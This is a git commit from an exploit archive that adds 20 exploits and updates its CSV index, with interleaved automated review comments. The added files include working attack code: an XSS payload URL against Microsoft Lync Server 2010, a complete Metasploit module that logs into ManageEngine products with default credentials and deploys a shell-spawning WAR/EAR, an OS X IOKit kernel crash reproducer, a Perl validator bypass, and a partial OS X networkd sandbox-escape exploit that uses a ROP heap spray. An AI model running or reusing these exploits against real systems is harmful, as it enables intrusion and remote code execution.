Update: 2015-01-22
20 new exploits
This commit is contained in:
parent
66b6bb6da3
commit
cdb1e00bef
21 changed files with 1702 additions and 2 deletions
24
files.csv
24
files.csv
|
@ -27253,7 +27253,7 @@ id,file,description,date,author,platform,type,port
|
|||
30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability",2007-07-26,r0ut3r,php,dos,0
|
||||
30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x Login.ASP Cross-Site Scripting Vulnerability",2007-07-26,d3hydr8,asp,webapps,0
|
||||
30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0
|
||||
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,"Parvez Anwar",windows,remote,0
|
||||
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,Unknown,windows,remote,0
|
||||
30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0
|
||||
30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0
|
||||
30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0
|
||||
|
@ -27391,7 +27391,7 @@ id,file,description,date,author,platform,type,port
|
|||
30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
|
||||
30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
|
||||
30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0
|
||||
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,"Parvez Anwar",windows,remote,0
|
||||
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0
|
||||
30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability",2007-09-04,"Tushar Vartak",jsp,webapps,0
|
||||
30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 Login.ASP SQL Injection Vulnerability",2007-09-04,SmOk3,asp,webapps,0
|
||||
30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow Vulnerability",2007-09-04,miyy3t,windows,remote,0
|
||||
|
@ -32274,6 +32274,7 @@ id,file,description,date,author,platform,type,port
|
|||
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
|
||||
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
|
||||
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
|
||||
35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
|
||||
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
|
||||
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
|
||||
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
|
||||
|
@ -32283,3 +32284,22 @@ id,file,description,date,author,platform,type,port
|
|||
35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
|
||||
35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
|
||||
35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
|
||||
35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter SQL Injection Vulnerability",2011-06-08,anonymous,php,webapps,0
|
||||
35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass Vulnerability",2011-06-08,dst,linux,remote,0
|
||||
35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 'email' Parameter Cross Site Scripting Vulnerability",2011-06-07,LiquidWorm,php,webapps,0
|
||||
35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
|
||||
35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
|
||||
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
|
||||
35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
|
||||
35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
|
||||
35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
|
||||
35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
|
||||
35847,platforms/osx/local/35847.c,"OS X networkd ""effective_audit_token"" XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
|
||||
35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
|
||||
35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
|
||||
35850,platforms/windows/local/35850.bat,"Microsoft Windows XP 'tskill' Local Privilege Escalation Vulnerability",2011-06-13,"Todor Donev",windows,local,0
|
||||
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 'user' and 'pass' SQL Injection Vulnerabilities",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 'ReachJoin.aspx' Remote Command Injection Vulnerability",2011-06-13,"Mark Lachniet",asp,webapps,0
|
||||
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
|
||||
|
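--- /dev/null
+++ b/platforms/asp/webapps/35852.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48235/info
+
+Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit this issue to execute arbitrary commands in the context of the application.
+
+Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected.
+
+https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//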
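Review bot: The advisory text (and the matching files.csv row) classifies this as remote command injection, but the only reproduction line shows the `reachLocale` value closing a JavaScript string literal and appending script that runs in the visitor's browser, which is reflected cross-site scripting, not server-side OS command execution. The mislabel matters for triage: an "arbitrary commands in the context of the application" finding is prioritised very differently from a reflected XSS. Suggest rewording the second paragraph to `Microsoft Lync Server 2010 is prone to a reflected cross-site scripting vulnerability in the reachLocale parameter of ReachJoin.aspx because it fails to properly sanitize user-supplied input.` and aligning the CSV description with it.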
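--- /dev/null
+++ b/platforms/java/remote/35845.rb
@@ -0,0 +1,437 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'ManageEngine Multiple Products Authenticated File Upload',
+'Description' => %q{
+This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
+AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
+the upload does not handle correctly '../' sequences, which can be abused to write
+in the file system. Authentication is needed to exploit this vulnerability, but this module
+will attempt to login using the default credentials for the administrator and guest
+accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
+combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
+versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
+SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
+module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
+been tested successfully in Windows and Linux on several versions.
+},
+'Author' =>
+[
+'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['CVE', '2014-5301'],
+['OSVDB', '116733'],
+['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
+['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
+],
+'DefaultOptions' => { 'WfsDelay' => 30 },
+'Privileged' => false, # Privileged on Windows but not on Linux targets
+'Platform' => 'java',
+'Arch' => ARCH_JAVA,
+'Targets' =>
+[
+[ 'Automatic', { } ],
+[ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
+{
+'attachment_path' => '/workorder/Attachment.jsp'
+}
+],
+[ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
+{
+'attachment_path' => '/common/FileAttachment.jsp'
+}
+],
+[ 'IT360 v8-v10.4',
+{
+'attachment_path' => '/common/FileAttachment.jsp'
+}
+]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Dec 15 2014'))
+
+register_options(
+[
+Opt::RPORT(8080),
+OptString.new('JSESSIONID',
+[false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
+OptString.new('IAMAGENTTICKET',
+[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
+OptString.new('USERNAME',
+[true, 'The username to login as', 'guest']),
+OptString.new('PASSWORD',
+[true, 'Password for the specified username', 'guest']),
+OptString.new('DOMAIN_NAME',
+[false, 'Name of the domain to logon to'])
+], self.class)
+end
+
+
+def get_version
+res = send_request_cgi({
+'uri' => '/',
+'method' => 'GET'
+})
+
+# Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
+version = [ 9999, 9999, 0, 'sd' ]
+
+if res && res.code == 200
+if res.body.to_s =~ /ManageEngine ServiceDesk/
+if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
+output = $1
+version = [output[0].to_i, output[2].to_i, '0', 'sd']
+end
+if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds
+version[2] = $1.to_i
+elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds
+version[2] = $1.to_i
+end
+elsif res.body.to_s =~ /ManageEngine AssetExplorer/
+if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
+res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
+output = $1
+version = [output[0].to_i, output[2].to_i, 0, 'ae']
+end
+if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
+version[2] = $1.to_i
+end
+elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
+# All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
+version[3] = 'sc'
+if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
+# ... but get the build number if we can find it
+version[2] = $1.to_i
+end
+elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
+# IT360 newer versions
+version[3] = 'it'
+end
+elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
+# IT360 older versions, not a very good detection string but there is no alternative?
+version[3] = 'it'
+end
+
+version
+end
+
+
+def check
+version = get_version
+# TODO: put fixed version on the two ifs below once (if...) products are fixed
+# sd was fixed on build 9031
+# ae and sc still not fixed
+if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
+(version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
+(version[3] == 'sc' && version[2] < 99999)
+return Exploit::CheckCode::Appears
+end
+
+if (version[2] > 9030 && version[3] == 'sd') ||
+(version[2] > 99999 && version[3] == 'ae') ||
+(version[2] > 99999 && version[3] == 'sc')
+return Exploit::CheckCode::Safe
+else
+# An IT360 check always lands here, there is no way to get the version easily
+return Exploit::CheckCode::Unknown
+end
+end
+
+
+def authenticate_it360(port, path, username, password)
+if datastore['DOMAIN_NAME'] == nil
+vars_post = {
+'LOGIN_ID' => username,
+'PASSWORD' => password,
+'isADEnabled' => 'false'
+}
+else
+vars_post = {
+'LOGIN_ID' => username,
+'PASSWORD' => password,
+'isADEnabled' => 'true',
+'domainName' => datastore['DOMAIN_NAME']
+}
+end
+
+res = send_request_cgi({
+'rport' => port,
+'method' => 'POST',
+'uri' => normalize_uri(path),
+'vars_get' => {
+'service' => 'ServiceDesk',
+'furl' => '/',
+'timestamp' => Time.now.to_i
+},
+'vars_post' => vars_post
+})
+
+if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
+# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
+return res.get_cookies
+else
+return nil
+end
+end
+
+
+def get_it360_cookie_name
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri("/")
+})
+cookie = res.get_cookies
+if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
+return $1
+else
+return nil
+end
+end
+
+
+def login_it360
+# Do we already have a valid cookie? If yes, just return that.
+if datastore['IAMAGENTTICKET']
+cookie_name = get_it360_cookie_name
+cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
+return cookie
+end
+
+# get the correct path, host and port
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri('/')
+})
+
+if res && res.redirect?
+uri = [ res.redirection.port, res.redirection.path ]
+else
+return nil
+end
+
+cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
+
+if cookie != nil
+return cookie
+elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
+# we've tried with the default guest password, now let's try with the default admin password
+cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
+if cookie != nil
+return cookie
+else
+# Try one more time with the default admin login for some versions
+cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
+if cookie != nil
+return cookie
+end
+end
+end
+
+nil
+end
+
+
+#
+# Authenticate and validate our session cookie. We need to submit credentials to
+# j_security_check and then follow the redirect to HomePage.do to create a valid
+# authenticated session.
+#
+def authenticate(cookie, username, password)
+res = send_request_cgi!({
+'method' => 'POST',
+'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
+'ctype' => 'application/x-www-form-urlencoded',
+'cookie' => cookie,
+'vars_post' => {
+'j_username' => username,
+'j_password' => password,
+'logonDomainName' => datastore['DOMAIN_NAME']
+}
+})
+if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
+# sd and ae respond with 302 while sc responds with a 200
+return true
+else
+return false
+end
+end
+
+
+def login
+# Do we already have a valid cookie? If yes, just return that.
+if datastore['JSESSIONID'] != nil
+cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
+return cookie
+end
+
+# First we get a valid JSESSIONID to pass to authenticate()
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri('/')
+})
+if res && res.code == 200
+cookie = res.get_cookies
+authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
+if authenticated
+return cookie
+elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
+# we've tried with the default guest password, now let's try with the default admin password
+authenticated = authenticate(cookie, 'administrator', 'administrator')
+if authenticated
+return cookie
+else
+# Try one more time with the default admin login for some versions
+authenticated = authenticate(cookie, 'admin', 'admin')
+if authenticated
+return cookie
+end
+end
+end
+end
+
+nil
+end
+
+
+def send_multipart_request(cookie, payload_name, payload_str)
+if payload_name =~ /\.ear/
+upload_path = '../../server/default/deploy'
+else
+upload_path = rand_text_alpha(4+rand(4))
+end
+
+post_data = Rex::MIME::Message.new
+
+if @my_target == targets[1]
+# old style
+post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
+post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
+post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
+post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
+post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
+post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
+post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
+else
+post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
+post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
+end
+
+data = post_data.to_s
+res = send_request_cgi({
+'uri' => normalize_uri(@my_target['attachment_path']),
+'method' => 'POST',
+'data' => data,
+'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+'cookie' => cookie
+})
+return res
+end
+
+
+def pick_target
+return target if target.name != 'Automatic'
+
+version = get_version
+if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
+(version[0] == 4 && version[3] == 'ae') ||
+(version[3] == 'sc')
+# These are all "old style" versions (sc is always old style)
+return targets[1]
+elsif version[3] == 'it'
+return targets[3]
+else
+return targets[2]
+end
+end
+
+
+def exploit
+if check == Exploit::CheckCode::Safe
+fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
+end
+
+print_status("#{peer} - Selecting target...")
+@my_target = pick_target
+print_status("#{peer} - Selected target #{@my_target.name}")
+
+if @my_target == targets[3]
+cookie = login_it360
+else
+cookie = login
+end
+
+if cookie.nil?
+fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
+end
+
+# First we generate the WAR with the payload...
+war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+war_payload = payload.encoded_war({ :app_name => war_app_base })
+
+# ... and then we create an EAR file that will contain it.
+ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+app_xml << '<application>'
+app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
+app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
+app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
+
+# Zipping with CM_STORE to avoid errors while decompressing the zip
+# in the Java vulnerable application
+ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+ear_file.add_file(war_app_base + '.war', war_payload.to_s)
+ear_file.add_file('META-INF/application.xml', app_xml)
+ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
+
+if @my_target != targets[3]
+# Linux doesn't like it when we traverse non existing directories,
+# so let's create them by sending some random data before the EAR.
+# (IT360 does not have a Linux version so we skip the bogus file for it)
+print_status("#{peer} - Uploading bogus file...")
+res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
+if res && res.code != 200
+fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
+end
+end
+
+# Now send the actual payload
+print_status("#{peer} - Uploading EAR file...")
+res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
+if res && res.code == 200
+print_status("#{peer} - Upload appears to have been successful")
+else
+fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
+end
+
+10.times do
+select(nil, nil, nil, 2)
+
+# Now make a request to trigger the newly deployed war
+print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+res = send_request_cgi({
+'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+'method' => 'GET'
+})
+# Failure. The request timed out or the server went away.
+break if res.nil?
+# Success! Triggered the payload, should have a shell incoming
+break if res.code == 200
+end
+end
+end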
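Review bot: In get_version the ServiceDesk branch seeds the build slot with the string `'0'` (`version = [output[0].to_i, output[2].to_i, '0', 'sd']`) while every other branch and the default use the integer 0; when neither build regex matches, check then evaluates `version[2] < 9031` on a String and Ruby raises ArgumentError (comparison of String with Integer) instead of returning a CheckCode. Change that line to `version = [output[0].to_i, output[2].to_i, 0, 'sd']`. Separately, get_it360_cookie_name dereferences `res.get_cookies` without testing res for nil, so a failed request surfaces as NoMethodError rather than the nil the caller handles; add `return nil unless res` before it. The same nil-tolerance gap applies to `uri[0]`/`uri[1]` in login_it360 only when res.redirection is missing, which is not covered by the redirect? check.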
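--- /dev/null
+++ b/platforms/linux/remote/35836.pl
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/48167/info
+
+The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
+
+Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
+
+#!/opt/perl/5.12/bin/perl
+
+use strict;
+use warnings;
+
+use Data::FormValidator;
+
+"some_unrelated_string" =~ m/^.*$/;
+
+my $profile = {
+untaint_all_constraints => 1,
+required => [qw(a)],
+constraint_methods => {
+a => qr/will_never_match/,
+},
+};
+
+my $results = Data::FormValidator->check({ a => 1 }, $profile);
+warn $results->valid('a');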
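Review bot: The script never states what output demonstrates the bypass, so a reader running it cannot tell a vulnerable result from a fixed one; since the constraint `qr/will_never_match/` cannot match the input `1`, a correct validator should leave `valid('a')` undefined, so add above the last line `# On an affected version this warns the value 1 even though the constraint cannot match; a fixed module warns an uninitialized value.` The role of the preceding `"some_unrelated_string" =~ m/^.*$/;` is also undocumented and presumably sets up regex match state the module later relies on; a one-line comment saying so would help. Finally the shebang is hard-wired to `/opt/perl/5.12/bin/perl`, which does not exist on most systems; `#!/usr/bin/env perl` is the portable form.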
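--- /dev/null
+++ b/platforms/osx/dos/35849.c
@@ -0,0 +1,46 @@
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <IOKit/IOKitLib.h>
+
+int main(){
+kern_return_t err;
+
+CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
+if(!matching){
+printf("unable to create service matching dictionary\n");
+return 0;
+}
+
+io_iterator_t iterator;
+err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
+if (err != KERN_SUCCESS){
+printf("no matches\n");
+return 0;
+}
+
+io_service_t service = IOIteratorNext(iterator);
+
+if (service == IO_OBJECT_NULL){
+printf("unable to find service\n");
+return 0;
+}
+printf("got service: %x\n", service);
+
+io_connect_t conn = MACH_PORT_NULL;
+err = IOServiceOpen(service, mach_task_self(), 2, &conn);
+if (err != KERN_SUCCESS){
+printf("unable to get user client connection\n");
+return 0;
+}else{
+printf("got userclient connection: %x\n", conn);
+}
+
+mach_vm_address_t addr = 0x414100000000;
+mach_vm_size_t size = 0x1000;
+
+err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
+return 0;
+}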
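Review bot: The result of the final IOConnectMapMemory call is stored in err but never examined, so on a system where the kernel survives the call the program exits 0 with no output, indistinguishable from the earlier success paths; for a reproducer that is meant to show "patched vs. affected" the status should be reported, e.g. `printf("IOConnectMapMemory returned %x\n", err); return err == KERN_SUCCESS ? 0 : 1;`. The same applies to every error branch, which prints a message but returns 0, so a wrapper script cannot distinguish "could not find service" from a completed run. Minor: `fcntl.h`, `stdlib.h` and `string.h` are included but nothing from them is used.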
185
platforms/osx/local/35847.c
Executable file
185
platforms/osx/local/35847.c
Executable file
|
@ -0,0 +1,185 @@
|
|||
// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
|
||||
// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
|
||||
// ianbeer
|
||||
#include <dlfcn.h>
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
#include <xpc/xpc.h>
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
|
||||
#include <mach/mach.h>
|
||||
#include <mach/mach_vm.h>
|
||||
#include <mach/task.h>
|
||||
|
||||
#include <mach-o/dyld_images.h>
|
||||
|
||||
#include "liblorgnette/lorgnette.h"
|
||||
|
||||
/* find the base address of CoreFoundation for the ROP gadgets */
|
||||
|
||||
void* find_library_load_address(const char* library_name){
|
||||
kern_return_t err;
|
||||
|
||||
// get the list of all loaded modules from dyld
|
||||
// the task_info mach API will get the address of the dyld all_image_info struct for the given task
|
||||
// from which we can get the names and load addresses of all modules
|
||||
task_dyld_info_data_t task_dyld_info;
|
||||
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
|
||||
err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
|
||||
|
||||
const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
|
||||
const struct dyld_image_info* image_infos = all_image_infos->infoArray;
|
||||
|
||||
for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
|
||||
const char* image_name = image_infos[i].imageFilePath;
|
||||
mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
|
||||
if (strstr(image_name, library_name)){
|
||||
return (void*)image_load_address;
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
|
||||
struct heap_spray {
|
||||
void* fake_objc_class_ptr; // -------+
|
||||
uint8_t pad0[0x10]; // |
|
||||
uint64_t first_gadget; // |
|
||||
uint8_t pad1[0x8]; // |
|
||||
uint64_t null0; // |
|
||||
uint64_t pad3; // |
|
||||
uint64_t pop_rdi_rbp_ret; // |
|
||||
uint64_t rdi; // |
|
||||
uint64_t rbp; // |
|
||||
uint64_t system; // |
|
||||
struct fake_objc_class_t { // |
|
||||
char pad[0x10]; // <----------+
|
||||
void* cache_buckets_ptr; //--------+
|
||||
uint64_t cache_bucket_mask; // |
|
||||
} fake_objc_class; // |
|
||||
struct fake_cache_bucket_t { // |
|
||||
void* cached_sel; // <--------+ //point to the right selector
|
||||
void* cached_function; // will be RIP :)
|
||||
} fake_cache_bucket;
|
||||
char command[256];
|
||||
};
|
||||
|
||||
xpc_connection_t connect(){
|
||||
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
|
||||
|
||||
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
|
||||
xpc_type_t t = xpc_get_type(event);
|
||||
if (t == XPC_TYPE_ERROR){
|
||||
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
|
||||
}
|
||||
printf("received an event\n");
|
||||
});
|
||||
xpc_connection_resume(conn);
|
||||
return conn;
|
||||
}
|
||||
|
||||
void go(){
|
||||
void* heap_spray_target_addr = (void*)0x120202000;
|
||||
struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
|
||||
memset(hs, 'C', 0x1000);
|
||||
hs->null0 = 0;
|
||||
